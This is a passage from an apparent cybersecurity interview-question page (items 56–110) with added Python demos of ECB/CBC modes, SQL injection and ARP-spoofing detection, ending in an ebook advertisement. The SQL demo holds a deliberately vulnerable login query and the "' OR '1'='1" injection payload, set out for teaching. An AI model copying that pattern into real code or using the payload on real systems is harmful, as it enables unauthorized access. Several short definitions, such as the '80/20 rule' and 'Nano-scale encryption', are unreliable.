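        "ecb_repeats": ecb[:BLOCK] == ecb[BLOCK:2 * BLOCK],        # pattern leaks
        "cbc_hides_repeat": cbc_a[:BLOCK] != cbc_a[BLOCK:2 * BLOCK],
        "iv_reuse_leaks": cbc_a == cbc_b,                           # equal messages visible
        "fresh_iv_differs": cbc_a != cbc_c,
        "roundtrip": cbc_decrypt(key, iv1, cbc_a) == message,
    }
```

Neither mode authenticates the ciphertext, so in production the choice is an authenticated mode (AES-GCM or ChaCha20-Poly1305) from a vetted library, with a nonce that is never reused under the same key.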

57) Explain a buffer overflow attack.

A buffer overflow attack is an attack that takes advantage of a process that attempts to write more data to a fixed-length memory block than the block can hold.

58) Define Spyware.

Spyware is a malware that aims to steal data about the organization or person. This malware can damage the organization's computer system.

59) What is impersonation?

It is a mechanism of assigning a user account to an unknown user.

60) What do you mean by SRM?

SRM stands for Security Reference Monitor. It provides routines for computer drivers to grant access rights to objects.

61) What is a computer virus?

A virus is malicious software that is executed without the user's consent. Viruses can consume computer resources, such as CPU time and memory. Sometimes, the virus makes changes in other computer programs and inserts its own code to harm the computer system.

A computer virus may be used to:

  • Access private data like user id and passwords

  • Display annoying messages to the user

  • Corrupt data in your computer

  • Log the user's keystrokes

62) What do you mean by Authenticode?

Authenticode is a technology that identifies the publisher of Authenticode-signed software. It allows users to ensure that the software is genuine and does not contain any malicious program.

63) Define CryptoAPI

CryptoAPI is a collection of encryption APIs which allows developers to create a project on a secure network.

64) Explain steps to secure web server.

Follow these steps to secure your web server:

  • Update file ownership.

  • Keep your webserver updated.

  • Disable extra modules in the webserver.

  • Delete default scripts.

65) What is Microsoft Baseline Security Analyzer?

Microsoft Baseline Security Analyzer or MBSA is a graphical and command-line interface that provides a method to find missing security updates and misconfigurations.

66) What is Ethical hacking?

Ethical hacking is a method to improve the security of a network. In this method, hackers fix vulnerabilities and weaknesses of a computer or network. Ethical hackers use software tools to secure the system.

67) Explain social engineering and its attacks.

Social engineering is the term used for convincing people to reveal confidential information.

There are mainly three types of social engineering attacks: 1) Human-based, 2) Mobile-based, and 3) Computer-based.

  • Human-based attack: Attackers may pretend to be a genuine user who requests a higher authority to reveal private and confidential information of the organization.

  • Computer-based attack: In this attack, attackers send fake emails to harm the computer. They ask people to forward such emails.

  • Mobile-based attack: Attackers may send SMS messages to others and collect important information. If any user downloads a malicious app, then it can be misused to access authentication information.

68) What is IP and MAC Addresses?

IP Address is the acronym for Internet Protocol address. An internet protocol address is used to uniquely identify a computer or a device such as a printer or storage disk on a computer network.

MAC Address is the acronym for Media Access Control address. MAC addresses are used to uniquely identify network interfaces for communication at the physical layer of the network.

69) What do you mean by a worm?

A Worm is a type of malware which replicates from one computer to another.

70) State the difference between virus and worm

Parameter                      | Virus                                                      | Worm
-------------------------------|------------------------------------------------------------|------------------------------------------------------------------
How does it infect a computer? | It inserts malicious code into a specific file or program. | It generates copies of itself and spreads using an email client.
Dependency                     | A virus needs a host program to work.                      | It does not require any host to function correctly.
Linked with files              | It is linked with .com, .xls, .exe, .doc, etc.             | It is linked with any file on a network.
Affecting speed                | It is slower than a worm.                                  | It is faster compared to a virus.

71) Name some tools used for packet sniffing.

Following are some tools used for packet sniffing.

  • Tcpdump

  • Kismet

  • Wireshark

  • NetworkMiner

  • Dsniff

72) Explain anti-virus sensor systems

Antivirus is a software tool that is used to identify, prevent, or remove the viruses present in the computer. It regularly performs system checks and increases the security of the computer.

73) List out the types of sniffing attacks.

Various types of sniffing attacks are:

  • Protocol Sniffing

  • Web password sniffing

  • Application-level sniffing

  • TCP Session stealing

  • LAN Sniffing

  • ARP Sniffing

74) What is a distributed denial-of-service attack (DDoS)?

It is an attack in which multiple computers attack a website, server, or any other network resource.

75) Explain the concept of session hijacking.

TCP session hijacking is the misuse of a valid computer session. IP spoofing is the most common method of session hijacking. In this method, attackers use IP packets to insert a command between two nodes of the network.

76) List out various methods of session hijacking.

Various methods of session hijacking are:

  • Using packet Sniffers

  • Cross-Site Scripting (XSS Attack)

  • IP Spoofing

  • Blind Attack

77) What are Hacking Tools?

Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers, and networks. There are varieties of such tools available on the market. Some of them are open source, while others are a commercial solution.

78) Explain honeypot and its Types.

Honeypot is a decoy computer system which records all the transactions, interactions, and actions with users.

Honeypot is classified into two categories: 1) Production honeypot and 2) Research honeypot.

  • Production honeypot: It is designed to capture real information for the administrator to assess vulnerabilities. They are generally placed inside production networks to increase their security.

  • Research honeypot: It is used by educational institutions and organizations for the sole purpose of researching the motives and tactics of the black-hat community for targeting different networks.

79) Name common encryption tools.

Tools available for encryptions are as follows:

  • RSA

  • Twofish

  • AES

  • Triple DES

80) What is Backdoor?

It is a type of malware in which the security mechanism is bypassed to access a system.

81) Is it right to send login credentials through email?

It is not right to send login credentials through email because if you send someone a user ID and password in the mail, the chances of email attacks are high.

82) Explain the 80/20 rule of networking?

This rule is based on the percentage of network traffic, in which 80% of all network traffic should remain local while the rest of the traffic should be routed towards a permanent VPN.

83) Define WEP cracking.

It is a method used for a security breach of wireless networks. There are two types of WEP cracking: 1) Active cracking and 2) Passive cracking.

84) What are various WEP cracking tools?

Well known WEP cracking tools are:

  • Aircrack

  • WebDecrypt

  • Kismet

  • WEPCrack

85) What is a security auditing?

Security auditing is an internal inspection of applications and operating systems for security flaws. An audit can also be done via line by line inspection of code.

86) Explain phishing.

It is a technique used to obtain a username, password, and credit card details from other users.

87) What is Nano-scale encryption?

Nano encryption is a research area which provides robust security to computers and prevents them from being hacked.

88) Define Security Testing?

Security Testing is defined as a type of Software Testing that ensures software systems and applications are free from any vulnerabilities, threats, and risks that may cause a big loss.

89) Explain Security Scanning.

Security scanning involves identifying network and system weaknesses and then providing solutions for reducing these risks. This scanning can be performed both manually and automatically.

90) Name the available hacking tools.

Following is a list of useful hacking tools.

  • Acunetix

  • WebInspect

  • Probely

  • Netsparker

  • Angry IP Scanner

  • Burp Suite

  • Savvius

91) What is the importance of penetration testing in an enterprise?

Here are two common applications of penetration testing.

  • Financial sectors like stock trading exchanges and investment banking want their data to be secured, and penetration testing is essential to ensure security.

  • In case the software system has already been hacked and the organization would like to determine whether any threats are still present in the system, to avoid future hacks.

92) What are the disadvantages of penetration testing?

Disadvantages of penetration testing are:

  • Penetration testing cannot find all vulnerabilities in the system.

  • There are limitations of time, budget, scope, and skills of penetration testers.

  • Data loss and corruption.

  • Downtime is high, which increases costs.

93) Explain security threat

A security threat is defined as a risk which can steal confidential data and harm computer systems as well as the organization.

94) What are physical threats?

A physical threat is a potential cause of an incident that may result in loss or physical damage to the computer systems.

95) Give examples of non-physical threats

Following are some examples of non-physical threats:

  • Loss of sensitive information

  • Loss or corruption of system data

  • Cyber security breaches

  • Disruption of business operations that rely on computer systems

  • Illegal monitoring of activities on computer systems

96) What is Trojan virus?

A Trojan is malware employed by hackers and cyber-thieves to gain access to a computer. Here attackers use social engineering techniques to execute the Trojan on the system.

97) Define SQL Injection

It is an attack that feeds malicious SQL statements to a database. It takes advantage of design flaws in poorly designed web applications to make them execute malicious SQL code. In many situations, an attacker can escalate a SQL injection attack in order to perform other attacks, e.g. a denial-of-service attack.
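The design flaw in question is building the SQL text out of user input. Below, as an added example rather than code from the original page, a login query written by string concatenation sits beside the parameterized version, run against an in-memory SQLite table with constructed rows; the passwords are stored in the clear only to keep the demo short (question 33 covers how they should really be stored).

```python
import sqlite3


def make_db():
    """Constructed table with two users; real systems store salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret-alice"), ("bob", "s3cret-bob")])
    return conn


def login_vulnerable(conn, name, password):
    """Concatenation: whatever the user types becomes part of the SQL statement."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, name, password):
    """Parameterized query: the driver passes the values separately from the SQL text,
    so a quote inside the password is just a character in a string, never SQL."""
    rows = conn.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                        (name, password))
    return [row[0] for row in rows]


def demo():
    conn = make_db()
    # The classic tautology: it closes the quoted literal, and because AND binds
    # tighter than OR the WHERE clause becomes true for every row.
    injected = "' OR '1'='1"
    return {
        "vulnerable": login_vulnerable(conn, "alice", injected),   # every user returned
        "safe": login_safe(conn, "alice", injected),                # nothing matches
        "safe_valid": login_safe(conn, "alice", "s3cret-alice"),    # normal login still works
    }
```

Parameterization is the fix; input filtering and a WAF (question 28) are defence in depth in front of it, not substitutes for it, and the application's database account should hold only the privileges the query needs so that a successful injection elsewhere cannot escalate.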

98) List security vulnerabilities as per Open Web Application Security Project (OWASP).

Security vulnerabilities as per open web application security project are as follows:

  • SQL Injection

  • Cross-site request forgery

  • Insecure cryptographic storage

  • Broken authentication and session management

  • Insufficient transport layer protection

  • Unvalidated redirects and forwards

  • Failure to restrict URL access

99) Define an access token.

An access token is a credential which is used by the system to check whether access to an API should be granted to a particular object or not.

100) Explain ARP Poisoning

ARP (Address Resolution Protocol) Poisoning is a type of cyber-attack that abuses the protocol used to convert IP addresses to physical addresses on a network device. The host sends an ARP broadcast on the network, and the recipient computer responds with its physical address.

ARP poisoning is sending fake addresses to the switch so that it associates the fake addresses with the IP address of a genuine computer on the network, which lets the attacker hijack the traffic.
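Because the attack works by changing which MAC address answers for an IP, it leaves a visible trace: the IP-to-MAC mapping flips, and one MAC starts answering for several IPs. The detector below is an added example, not from the original page; it runs over a constructed list of observed ARP replies (time, sender IP, sender MAC), with the addresses and the one-IP-per-MAC threshold chosen for the demo.

```python
from collections import defaultdict

# Constructed ARP reply observations: (seconds, sender IP, sender MAC).
OBSERVATIONS = [
    (0, "192.168.1.1", "aa:bb:cc:00:00:01"),    # the real gateway
    (1, "192.168.1.20", "aa:bb:cc:00:00:20"),
    (2, "192.168.1.21", "aa:bb:cc:00:00:21"),
    (30, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (31, "192.168.1.1", "de:ad:be:ef:00:99"),   # a different MAC now claims the gateway IP
    (32, "192.168.1.20", "de:ad:be:ef:00:99"),  # the same MAC also claims a host IP
    (33, "192.168.1.1", "de:ad:be:ef:00:99"),
]


def detect_arp_spoofing(observations, max_ips_per_mac=1):
    """Return alerts for (a) an IP whose MAC changes and (b) a MAC that answers for
    more IPs than the threshold allows. Each condition is reported when it first occurs."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for t, ip, mac in observations:
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append((t, "ip-mac-change", ip, known, mac))
        ip_to_mac[ip] = mac

        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > max(before, max_ips_per_mac):
            alerts.append((t, "mac-claims-many-ips", mac, sorted(mac_to_ips[mac])))
    return alerts


def demo():
    return detect_arp_spoofing(OBSERVATIONS)
```

A mapping change has benign causes too (a replaced NIC, DHCP handing the address to another host, a router using virtual IPs), so the alert is a trigger for checking against the inventory, while pinning the gateway with a static ARP entry on critical hosts and enabling Dynamic ARP Inspection on the switch remove the attack rather than just observe it.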

101) Name common types of non-physical threats.

Following are various types of non-physical threats:

  • Trojans

  • Adware

  • Worms

  • Spyware

  • Denial of Service Attacks

  • Distributed Denial of Service Attacks

  • Virus

  • Key loggers

  • Unauthorized access to computer systems resources

  • Phishing

102) Explain the sequence of a TCP connection.

The sequence of a TCP connection is SYN, SYN-ACK, ACK.

103) Define hybrid attacks.

A hybrid attack is a blend of the dictionary method and a brute force attack. This attack is used to crack passwords by modifying a dictionary word with symbols and numbers.

104) What is Nmap?

Nmap is a tool which is used for network discovery and security auditing.

105) What is the use of EtterPeak tool?

EtterPeak is a network analysis tool that is used for sniffing packets of network traffic.

106) What are the types of cyber-attacks?

There are two types of cyberattacks: 1) Web-based attacks, 2) System-based attacks.

107) List out web-based attacks

Some web-based attacks are: 1) SQL Injection attacks, 2) Phishing, 3) Brute Force, 4) DNS Spoofing, 5) Denial of Service, and 6) Dictionary attacks.

108) Give examples of System-based attacks

Examples of system-based attacks are:

  • Virus

  • Backdoors

  • Bots

  • Worm

109) List out the types of cyber attackers

There are four types of cyber attackers. They are: 1) cybercriminals, 2) hacktivists, 3) insider threats, 4) state-sponsored attackers.

110) Define accidental threats

They are threats that are accidentally caused by organization employees. In these threats, an employee unintentionally deletes a file or shares confidential data with outsiders or a business partner, going beyond the policy of the company.

Ethical Hacking Tutorial for Beginners PDF

An Ethical Hacker exposes vulnerabilities in software to help business owners fix those security holes before a malicious hacker discovers them. In this eBook, you learn all about Ethical hacking with loads of live hacking examples to make the subject matter clear.

Key Highlights of Ethical Hacking Tutorial PDF are

  • 204+ pages

  • eBook Designed for beginners

  • Beautifully annotated screenshots

  • You will get lifetime access

Inside this PDF

  1. What is Hacking? Introduction & Types

  2. Potential Security Threats To Your Computer Systems

  3. Skills Required to Become a Ethical Hacker

  4. What is Social Engineering? Attacks, Techniques & Prevention

  5. Cryptography Tutorial: Cryptanalysis, RC4, CrypTool

  6. How to Crack a Password

  7. Worm, Virus & Trojan Horse: Ethical Hacking Tutorial

  8. Learn ARP Poisoning with Examples

  9. Wireshark Tutorial: Network & Passwords Sniffer

  10. How to Hack WiFi (Wireless) Network

  11. DoS (Denial of Service) Attack Tutorial: Ping of Death, DDOS

  12. How to Hack a Web Server

  13. How to Hack a Website: Online Example

  14. SQL Injection Tutorial: Learn with Example

  15. Hacking Linux OS: Complete Tutorial with Ubuntu Example

  16. CISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary

  17. 10 Most Common Web Security Vulnerabilities

  18. Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap

